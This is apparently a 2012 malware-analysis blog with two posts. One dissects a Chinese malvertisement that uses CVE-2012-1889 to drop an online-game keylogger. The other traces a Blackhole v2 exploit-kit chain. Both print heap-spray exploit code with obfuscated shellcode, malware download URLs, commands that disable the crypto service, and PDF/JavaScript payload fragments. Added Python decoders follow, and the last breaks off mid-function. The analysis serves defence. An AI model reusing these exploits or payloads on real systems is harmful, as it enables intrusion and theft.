Sunday, September 30, 2012

Chinese Malvertisement of OnlineGame Trojan/InfoStealer by Exploiting CVE-2012-1889 (MS-XML bugs MS12-043)

I first wrote this up in pastebin yesterday while "crusading" with #MalwareMustDie friends.
It is a malvertisement for a Chinese online game, served from the host below in Shanghai, China:
IP: 222.73.57.117
inetnum:        222.64.0.0 - 222.73.255.255
netname:        CHINANET-SH
descr:          CHINANET shanghai province network
descr:          China Telecom
descr:          No1,jin-rong Street
descr:          Beijing 100032
country:        CN
The domain is owned by a Chinese individual:
person:         Wu Xiao Li
address:        Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country:        CN
phone:          +86-21-63630562
fax-no:         +86-21-63630566
e-mail:         ip-admin@mail.online.sh.cn
nic-hdl:        XI5-AP
mnt-by:         MAINT-CHINANET-SH
changed:        ip-admin@mail.online.sh.cn 20010510
source:         APNIC
My post in pastebin is here--->>[PASTEBIN] and here--->>[PASTEBIN]
A lot of questions came up, so I am writing it up now. I will keep this short.
I saw these infection URLs while checking spam; the first group leads to xop.html:
The others lead to index.html...
The index.html, as plainly seen in its code, uses simple unobfuscated JavaScript/HTML to drop wd.exe, an online-game trojan and info stealer. *) the dropping code:
<SPAN class=s1><A href="h00p://222.73.57.117/exe/wd.exe">ホハオタヌャタ、ヘ篁メ2.0-イサハユキム</A></SPAN>
<SPAN class=s4><SMALL><FONT style="COLOR: #c7b389">ヘニシ・/FONT></SMALL></SPAN>
<SPAN class=s2><font class="red"><script>sd--;document.write(sy+"-"+sm+"-"+sd);</script></font>  <BR><FONT color=#b7b7b7><script>sh--;si--;ss--;document.write(sh+":"+si+":"+ss);</script></FONT></SPAN>
<SPAN class=s3><A href="h00p://222.73.57.117/exe/wd.exe">᾵リマツヤリ</A></SPAN>
<EM style="CLEAR: both; DISPLAY: block"></EM>
<P class=txt>ヒオテ・兤 վウ、カ・fヘニシトメۿ隆篁メ㬺òサコテモテìモテチヒイナヨʵ#。</P>
WD.EXE is already a well-detected trojan, so I am not going to disclose it further. You can check it out in VirusTotal here:
MD5: 8e75d7855a5ae13da08ec21d7df673e7
File size: 32.0 KB ( 32768 bytes )
File name: 8E75D7855A5AE13DA08EC21D7DF673E7.bin
File type: Win32 EXE
Tags: peexe upx
Detection: 37 / 43
URL:------->[VIRUSTOTAL]
If we take a look into XOP.HTML, it has JavaScript to generate the exploit. I ONLY snip some important parts, starting from the exploit initiation below:
heapLib.ie = function(maxAlloc, heapBase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);
    this.paddingStr = "AAAA";
    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }
    this.mem = new Array();
    this.flushOleaut32();
}
...and see the next code after that in the pastebin here--->>[HERE]. I detected CVE-2012-1889, which attacks the MS-XML bug fixed in MS12-043 and seeks arbitrary command execution. In the browser log you can see the following:
[2012-09-30 17:46:47] [HTTP] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
[2012-09-30 17:46:48] <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
[2012-09-30 17:46:48] ActiveXObject: F6D90F11-9C73-11D3-B32E-00C04F990BB4
[2012-09-30 17:46:48] <meta content="IE=7" http-equiv="X-UA-Compatible"/>
↑the object "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" used is the PoC for CVE-2012-1889, which you can confirm in securityfocus.com-->>[HERE]. That CVE-2012-1889 was used to execute the evil shellcode generated as follows:
var heap_obj = new heapLib.ie(0x20000);
var sdgryyesc = "%uschwmd5db%uschwmc9c9%uschwm87cd%uschwm9292%uschwm8f8f%uschwm938f%uschwm8e8a%uschwm8893%uschwm938a%uschwm8c8c%uschwm928a%uschwmc5d8%uschwm92d8%uschwmc5d7%uschwmd893%uschwmd8c5%uschwmbdbd%uschwmbdbd";
var sdgryyev = (sdgryyesc.replace(/schwm/g,""));
var fdgertrepx = "%schwmuBschwmDBschwmD%uBDBschwmD%uBDBschwmD%uBDBD%uBDBschwmD%uBschwmDBD%uBDBschwmD%uBDBschwmD%uEAEA";
var fdgertrepx88 = (fdgertrepx.replace(/schwm/g,""));
var fdgertrepx99 = "%u54FF%uBEA3%uBDschwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uschwmBDBC%u36BD%uD7schwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDschwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDschwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7schwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBschwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7schwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBschwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66schwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bschwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDschwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDschwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADschwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55schwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bschwm55%uBDBD%u7EBD%u1D55%uBDschwmBD%u0schwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5schwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CschwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AschwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD
945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5schwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8schwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42schwmEA%uB9schwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%schwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61schwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93schwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%schwmuBE10%u8E78%uB266%uAD03%u6Bschwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36schwm60%u3schwm6B9%u78schwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uschwmD919%u2E5schwm2%u59schwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBschwm0DB%uFE42%u1103%uC066%u18schwm4D%uEF27%u1A43%u8367%u0BschwmA0%u0584%u69schwmD4%u03A6%uschwmDBC2%u411D%u8A14%u25schwm10%uschwmAschwmDB7%schwmu3D45%u12schwm6B%u4627%uA8EE";
var fdgertrepx98 = (fdgertrepx99.replace(/schwm/g,""));
var fdgertrepx123 = "%u58schwmayt58%u58schwmayt58%u10schwmaytEB%u4Bschwmayt5B%uC9schwmayt33%uB9schwmayt66%u03schwmaytB8%u34schwmayt80%uBDschwmayt0B%uFAE2%u05schwmaytEB%uEBschwmaytE8%uFFschwmaytFF";
var fdgertrepx1 = (fdgertrepx123.replace(/schwmayt/g,""));
var sdfetwedvz = "HJKS0c0"+"cHJKS0c"+"0c";
var code = unescape(fdgertrepx1+fdgertrepx98+sdgryyev+fdgertrepx88);
var nops = unescape(sdfetwedvz.replace(/HJKS/g,'%u'));
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x100);
var shellc0de = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellc0de.length < 0x40000) shellc0de += shellc0de;
var block = shellc0de.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {heap_obj.alloc(block);
Goes to this shellcode:

It can easily be brute-forced to burp out the malicious URL; some XOR effort will lead you to the strings:

h00p://[IP]/exe/[char].exe &jx
put them together and you get:
h00p://222.73.57.117/exe/jx.exe
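As an added example (not code from the post or from the kit), here is an analyst-side Python helper that undoes the encoding tricks in the snippet above: it strips the "schwm"/"schwmayt" junk tokens, rebuilds the "HJKS"-masked NOP escapes, converts the %u escapes to the little-endian bytes they occupy in memory, and then brute-forces a single-byte XOR key by searching for a URL prefix, the way the "some XOR efforts" step does. The sample bytes, the placeholder URL (documentation IP 203.0.113.5) and the key 0x3c are constructed; the real key is not stated on the page.

```python
"""Analyst helpers for the xop.html shellcode stage shown above.

Added example: this is not code from the original post or from the exploit
kit.  It undoes two things the page's JavaScript does before the heap spray:
  1. junk tokens ("schwm", "schwmayt") are spliced into %uXXXX escapes and
     later removed with .replace(); the "HJKS" token stands in for "%u" in
     the NOP sled;
  2. the decoded escapes are bytes in memory (UTF-16LE code units), and the
     post says the payload URL inside them is recovered with "some XOR
     efforts", so a single-byte XOR brute force for a URL prefix follows.
The sample bytes, the URL (documentation IP) and the XOR key are constructed.
"""
import re

# Longer token first: removing "schwm" before "schwmayt" would leave "ayt" behind.
JUNK_TOKENS = ("schwmayt", "schwm")
ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def strip_junk(s, tokens=JUNK_TOKENS):
    """Replicate the kit's .replace(/schwm/g, '') calls in a safe order."""
    for tok in tokens:
        s = s.replace(tok, "")
    return s


def unescape_to_bytes(s):
    """Turn a JavaScript unescape() input into the UTF-16LE bytes it occupies.

    %uXXXX becomes one 16-bit code unit; %XX and literal characters become a
    code unit with a zero high byte, exactly as the sprayed string would lie
    in the browser's heap.
    """
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(s):
        for ch in s[pos:m.start()]:
            out += ord(ch).to_bytes(2, "little")
        out += int(m.group(1) or m.group(2), 16).to_bytes(2, "little")
        pos = m.end()
    for ch in s[pos:]:
        out += ord(ch).to_bytes(2, "little")
    return bytes(out)


def find_xor_strings(data, markers=(b"http://", b"https://")):
    """Try every single-byte XOR key; return (key, string) for each marker hit."""
    hits = []
    for key in range(256):
        plain = bytes(b ^ key for b in data)
        for marker in markers:
            start = plain.find(marker)
            while start != -1:
                end = start
                while end < len(plain) and 0x21 <= plain[end] <= 0x7E:
                    end += 1
                hits.append((key, plain[start:end].decode("ascii")))
                start = plain.find(marker, end)
    return hits


def recover_payload_url(escaped_js_string):
    """Full pipeline: strip junk, decode escapes, XOR-search for the URL."""
    blob = unescape_to_bytes(strip_junk(escaped_js_string))
    return find_xor_strings(blob)


# --- constructed sample, mimicking the page's encoding tricks -------------
def to_escapes(data):
    """Encode bytes the way the kit stores them: little-endian %uXXXX pairs."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%02x%02x" % (data[i + 1], data[i])
                   for i in range(0, len(data), 2))


SAMPLE_KEY = 0x3C                                 # constructed, not from the post
SAMPLE_URL = b"http://203.0.113.5/exe/jx.exe"     # documentation IP as placeholder
SAMPLE_NOPS = "HJKS0c0" + "cHJKS0c" + "0c"        # same construction as the page
SAMPLE_ESCAPED = (
    SAMPLE_NOPS.replace("HJKS", "%u")
    + to_escapes(bytes(b ^ SAMPLE_KEY for b in SAMPLE_URL + b"\x00"))
      .replace("%u", "%uschwm")
)

if __name__ == "__main__":
    for key, url in recover_payload_url(SAMPLE_ESCAPED):
        print("key=0x%02x  %s" % (key, url))
```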
Since many asked me how I cracked this, here is a PoC snapshot. So let's move on and grab it:
--03:01:26--  h00p://222.73.57.117/exe/jx.exe
           => `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
Just looking into the binary you'll see many strange things:
// Malware OP traces...

000000002FE6   0000004047E6      0   MoveFileA
000000003032   000000404832      0   WriteFile
00000000303E   00000040483E      0   CreateFileA
00000000304C   00000040484C      0   WinExec
000000003074   000000404874      0   CopyFileA

// keystroke controlling...

0000000030C0   0000004048C0      0   GetKeyboardLayoutList
0000000030D8   0000004048D8      0   GetKeyboardLayoutNameA
0000000030F2   0000004048F2      0   ActivateKeyboardLayout
00000000310C   00000040490C      0   GetKeyboardLayout
000000003120   000000404920      0   LoadKeyboardLayoutA
000000003136   000000404936      0   UnloadKeyboardLayout

// IME Traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C   00000040520C      0   %c:\Recycled\%d.tmp
000000003820   000000405220      0   %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C   00000040FA5C      0   sc delete cryptsvc
00000000E070   00000040FA70      0   sc config cryptsvc start= disabled
00000000E094   00000040FA94      0   net stop cryptsvc

//registry added traces

00000000E0A8   00000040FAA8      0   %s%s%d.dll // kbdus.dll
00000000E0DC   00000040FADC      0   SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8   00000040FAF8      0   JX3Client  // JX3Client.exe
00000000E104   00000040FB04      0   Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134   00000040FB34      0   %sdllcache\%s
00000000E144   00000040FB44      0   %syu%s     // net1.exe
The behavior check shows:
//Drops
%Appdata%\JX3Client.exe
%System%\chinasougou.ime
%System%\yumidimap.dll
%System%\net1.exe 

//Registry...(as per expected)
SOFTWARE\kingsoft\JX3\zhcn Value: "JX3Client.exe"

//Runs/control services:
net1.exe
sc.exe

//crypter service:
cryptsvc
It looks like an online game client with trojan functions that dumps your keystrokes. If you like online games, avoid using these tools. It looks like this; found it on Chinese sites..: Currently VirusTotal has a good detection ratio for this:
MD5: bbfc347f66c1c361e7bd401f2f0d448e
File size: 47.0 KB ( 48128 bytes )
File name: sample
File type: Win32 EXE
Tags: peexe upx mz cve-2012-1889 exploit
Detection: 35 / 42
Analysis: 2012-09-29 19:16:46 UTC ( 8 hours, 20 minutes ago )
URL:------->>[VIRUSTOTAL]
With malware names (NOTE that the original & unpacked binary have very different namings...sigh..)
First Check in VT: (PACKED/ORIGINAL BINARY)
-------------------------------------------
McAfee                   : Artemis!BBFC347F66C1
K7AntiVirus              : Riskware
TheHacker                : Posible_Worm32
F-Prot                   : W32/Heuristic-114!Eldorado
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall     : TROJ_GEN.RCBCEHF
Kaspersky                : HEUR:Trojan.Win32.Generic
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/ATRAPS.Gen
TrendMicro               : TROJ_GEN.RCBCEHF
McAfee-GW-Edition        : Artemis!BBFC347F66C1
Jiangmin                 : Trojan/Generic.algbo
Microsoft                : PWS:Win32/Lolyda.BF
Commtouch                : W32/Heuristic-114!Eldorado
AhnLab-V3                : Trojan/Win32.Xema
VBA32                    : TrojanPSW.QQTen.ng
PCTools                  : Trojan.Gen
Ikarus                   : Trojan-PWS.Win32.Lolyda
Fortinet                 : W32/Onlinegames.QBF!tr
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file

First Check in VT: (UNPACKED)
-------------------------------
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
DrWeb                    : BackDoor.PcClient.5930
GData                    : Dropped:Trojan.PWS.FakeIME.B
Symantec                 : Suspicious.Cloud.5
Norman                   : W32/OnLineGames.NVOE
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
eScan                    : Dropped:Trojan.PWS.FakeIME.B
Fortinet                 : W32/Onlinegames.QBF!tr
Emsisoft                 : Trojan-PWS.Win32.Lolyda!IK
VBA32                    : TrojanPSW.QQTen.ng
Kaspersky                : HEUR:Trojan.Win32.Generic
Jiangmin                 : Trojan/Generic.algbo
Rising                   : Trojan.Win32.Fednu.uhc
Ikarus                   : Trojan-PWS.Win32.Lolyda
AntiVir                  : TR/Crypt.ZPACK.Gen
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file
ViRobot                  : Trojan.Win32.A.PSW-Frethoq.51200
Comodo                   : TrojWare.Win32.Poison.QBF

Saturday, September 22, 2012

Following a lead of "Suspected" Blackhole2 - New changes in plugin detect PDF's infection method, PDF/JavaScript codes

Firstly, special thanks for the first lead to @it4sec! This post is dedicated to all #MalwareMustDie members and supporters for being solid friends!

Assuming the current targets are BlackHole v2.0 infectors online, we picked two URLs from a blacklist which lead to one infection. This is a story of peeling the threat. But before we continue, one more thing: this post is based on reversing we did while racing against time, so sorry if you are unhappy with the lack of details; please bear with it. Hope it is useful. Here we go:

We got the links below, which lead to the same infection case:
h00p://85.18.21.252/cKMXzC0n/index.html
h00p://85.18.21.252/SgcjN3i/index.html
(this information we picked up from a blacklist; contact me for the source..)
We fetched it :
h00p://85.18.21.252/cKMXzC0n/index.html
--14:18:35--  h00p://85.18.21.252/SgcjN3i/index.html
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 418 [text/html]
14:18:37 (1.51 KB/s) - `index.html' saved [418/418]
To find the code below, which contains 4 (four) links to js.js files...
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://rolandpangrati.com/N65FCWa1/js.js"></script>
<script type="text/javascript" src="h00p://grupo-amaro.com/GpuVcKtR/js.js"></script>
<script type="text/javascript" src="h00p://www.laptopcolorat.com/zeScNpWp/js.js"></script>
<script type="text/javascript" src="h00p://grupocitometria.org.ar/ZfHxvN8N/js.js"></script>

</html>
Those js.js files are identical to one another (diff'ed them all), and look like the contents below... (to save space, I pasted only two)
--14:19:48--  h00p://rolandpangrati・com/N65FCWa1/js.js
           => `js.js'
Resolving rolandpangrati・com... 89.42.216.137
Connecting to rolandpangrati.com|89.42.216.137|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:19:49 (1.14 MB/s) - `js.js' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';

--14:22:56--  http://www.laptopcolorat.com/zeScNpWp/js.js
           => `js.js.1'
Resolving www.laptopcolorat・com... 31.14.23.252
Connecting to www.laptopcolorat.com|31.14.23.252|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:22:57 (2.04 MB/s) - `js.js.1' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';
↑So this is the link of the actual landing page (anybody_miss-knowing.php). We saw the obfuscated BlackHole PluginDetect v0.7.8 code written there: ↑the upper part was the obfuscation code, followed by the decoder logic. If you deobfuscate it well you'll get this "neutralized" code-->>[PASTEBIN]. The technique used in the obfuscation is to hide the data behind a "google" element, using tag attribute values to store the obfuscated data:
<u 
id="google" 
d0="&4442494b46%3d42142o3o%453j3l3q2c^3h44…
d1="3q144449&403h3r3i14$3e15251645_3q3g3h3…
d2="e2525+163i453q3f@443l3r3q16+4d1g3l432r…
    :
    :    
d93="23d1k1i(33423l443h(1c423d1m1i$423h434…
d94="423q^3r1d4b4d3g_3r3f453p3h$3q441i4742…>
</u>
↑Additional (2012 Sept 24th) log, IMPORTANT! Please note, for deobfuscation of the current sample, many automation schemes fail to deobfuscate it correctly or hang. This is because the obfuscation code separates the JavaScript calls/code it uses; it is a simple string trick, yet it works to fool some signatures. In a similar sample we found the calls were put in variables like this:
<html><body><script>
g="getElementById";
ss=String.fromCharCode;
gg="getAttribute";</script>
..and there was also string manipulation to hide the eval() wording:
{window["e"+"v"+"a"+"l"](s);}
There is a step-by-step manual deobfuscation here:-->>[PASTEBIN], which can be used as a reference for patching many automation tools. While tracing the infection code of PluginDetect with the browser's logic, we will explain only 3 infection routes, which can be simulated accordingly. (By the time I got this hint, many objects couldn't be reached.. lack of evidence.)
1. Java Exploitation
1.1. Updating/installing the old Java update 1.6.0 / vulnerable version... (I really hope the below URL or related URLs at sun.com are deleted soon!)
 <object 
 classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" 
 codebase="h00p://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" 
 WIDTH="200" HEIGHT="200" >
1.2. After your browser has the vulnerable Java installed, it downloads a malicious Java applet with a zero-day PoC exploiting arbitrary-exec shellcode to download another evil binary..
 <PARAM NAME="ARCHIVE" VALUE="h00p://THIS-HOST-ADDRESS/links/anybody_miss-knowing.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn">
 <param name="type" value="application/x-java-applet;version=1.6">
↑by the time we got the URL the applet was not accessible anymore, so we cannot describe more of it.
2. The vector of the infection using MSXML2.XMLHTTP/CVE-2010-2561:
2.1. Opening ActiveXObject + creating 3 objects: adodb.stream, Shell.Application, and msxml2.XMLHTTP
2.2. Linked to ./anybody_miss-knowing.php?[specific parameter] to download the exploit
2.3. If this exploit (CVE-2010-2561) works, it will drop you an exe (.//..//c175065.exe)
2.4. The ActiveX command ShellExecute will be used to execute the payload (this shellcode was using the format explained in the previous post-->>[URL])
The logs of the above steps...
ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
[HTTP] URL: x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002 (Status: 200, Referrer: http://69.194.192.203/links/anybody_miss-knowing.php)
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream)
ActiveXObject: adodb.stream
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application)
ActiveXObject: shell.application
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP)
ActiveXObject: msxml2.xmlhttp
[Microsoft XMLHTTP ActiveX] open('GET', 'x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm', False)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm (method: GET)
[Adodb.Stream ActiveX] open
[Adodb.Stream ActiveX] Write
[Adodb.Stream ActiveX] SaveToFile (.//..//c175065・exe)
[Adodb.Stream ActiveX] Close
[Shell.Application ActiveX] ShellExecute command: .//..//c175065・exe
3. PDF Exploitation - Slight New Changes Detected.. We have a good sample of this, so we can say more. PluginDetect looks at your Adobe version, then drops the PDF exploit. But slight changes were found compared to the previous code: it is not using splx() anymore. Reason? Yes, to avoid detection, and that crude idea works! The way this code detects the Adobe version is as below (same as before..):
   PluginDetect.initScript();
   PluginDetect.getVersion(".");
   pdfver=PluginDetect.getVersion("AdobeReader");
It redirects you to the evil PDF download URL below (same as before..):
 function x(s)
 {
   d=[];
   for(i=O;i<s.length;i++)
   {
     k=(s.charCodeAt(i)-46).toString(16);
     if(k.length==1)k="O"+k;
     d.push(k);
   };
   return d.join("");
 }
 end_redirect=function()
 {
 };
 window.onbeforeunload=function()
or, depending on the version, goes to the NEW BHEK2 URL with an evil IFRAME now:
   show_pdf2=function(src)
   {
     var pifr=document.createElement('IFRAME');
     pifr.setAttribute('width',1);
     pifr.setAttribute('height',1);
     pifr.setAttribute('src',src);
     document.body.appendChild(pifr)
   };
   show_pdf2(window.location+"?mkk="+x("ebOf8")+"&jiypmeg="+x("m")+"&eawqt=O337O3O2O737O6343433&ytejxs="+x(pdfver.join(".")));
 }
Which was reversed and runs as below..

[iframe redirection] x.x.x.x/links/anybody_miss-knowing.php -> x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
This means the previous PDF version check used in BHEK 1.3.2 (see below) is gone, although the same PluginDetect code base is still in use! It is understandable, since BHEK2 uses a longer download URL format with more parameters.. It is important evidence that the PluginDetect code has also started to be changed..
   Function spl3(){
  iF (pdFver「O」 > O && pdFver「O」 < 8){
    exec7 = O;
    show_pdF('./data/ap1.php?F=F4dFb')
  }
  else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 <= 3)){
    exec7 = O;
    show_pdF('./data/ap2.php')
  }
  spl4()
*) There are at least 5 to 6 ways of dropping exploits via this evil plugin; in the sample we grabbed only 3 (three) infection traces were detected.
The PDF Exploit Used (the JavaScript part below has new code..)
As described above, there are 2 (two) PDF exploits used in the logic of PluginDetect; in this case both lead to files with the same logic (different md5). This PDF uses an interesting way which wasn't used in previous PDF exploits.. The format is the same, containing three parts: JavaScript, exploit code & shellcode, as per the snips pasted below (all code is neutralized/uninfected/useless code..)
Exploits:
<<
 /Keywords(3d40401i3d3o3h4244253h463h3q441i…
1l1o1l1o1l1o1l1o1l1o1l1o1l1o1l161f3h463h3q441i443d…
1i463l3h473h42323h42433l3r3q1i443r2r44423l3q3j1c1d…
3d3n1d233o3r48333k3h3h253b2h1l1f4340423d49233o3r48…
3j1i3i423r3p2b3k3d422b3r3g3h1c3f1d234d423h4445423q…
3r3q143b3m1m1c3b2h1l1d4b3b2h1p251b1b233i3r421c3b2h…
292a2929292929292929292929292p29292929292929293548…
3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o…
Shellcode:
 /CreationDate(66,83,e4,fc,fc,85,…
,10,83,c3,05,ff,e3,68,6f,6e,00,00,68,75,…
,70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39,…
>>
JavaScript:
<xfa:script contentType='application/x-javascript'>
with(event){
k=target["eva";+";l";];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.keywords;}
}
s="";
z=a;
for(i=0;i<;a.length;i+=2){
 s+=String.fromCharCode(parseInt(z.substr(i,2),28));}
k(s);
</xfa:script>
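As an added example (not code from the post, from PluginDetect or from the kit), the Python below inverts the two small encodings quoted above: the landing page's x() transform behind the mkk=/jiypmeg=/ytejxs= parameters (seen in the show_pdf2 call and the iframe log), and the base-28 /Keywords scheme that the PDF's XFA script feeds to eval, plus the comma-separated hex of /CreationDate. The function names are mine; the sample values are the ones visible on this page (the Keywords and CreationDate strings only as far as they are shown).

```python
"""Decoders for the small encodings used by the BHEK2 landing page and its PDF
(added example; not code from the post, from PluginDetect or from the kit).

  * x(s) in the landing page emits two hex digits of (charCode - 46) per
    character and builds the mkk=, jiypmeg= and ytejxs= values with it.
  * the PDF's XFA script reads /Keywords two characters at a time as a
    base-28 number and hands the result to eval; /CreationDate holds the
    shellcode as comma-separated hex bytes.
Sample values are the ones quoted in the post; encode_* are round-trip
helpers of my own and the function names are not the kit's.
"""
from urllib.parse import parse_qsl, urlsplit

BASE28 = "0123456789abcdefghijklmnopqr"   # digits parseInt(.., 28) accepts
HEXDIGITS = "0123456789abcdefABCDEF"


def decode_x(value):
    """Inverse of x(): each hex pair, plus 46, is one character."""
    if len(value) % 2 or not all(c in HEXDIGITS for c in value):
        raise ValueError("not an x() encoded value: %r" % value)
    return "".join(chr(int(value[i:i + 2], 16) + 46)
                   for i in range(0, len(value), 2))


def encode_x(text):
    """Same transform as the page's x(); the post's 'O' digits are neutralised zeros."""
    return "".join("%02x" % (ord(c) - 46) for c in text)


def decode_query(url):
    """Decode every parameter of a landing-page request.

    None marks a value that x() cannot have produced (not a hex-pair string).
    """
    decoded = {}
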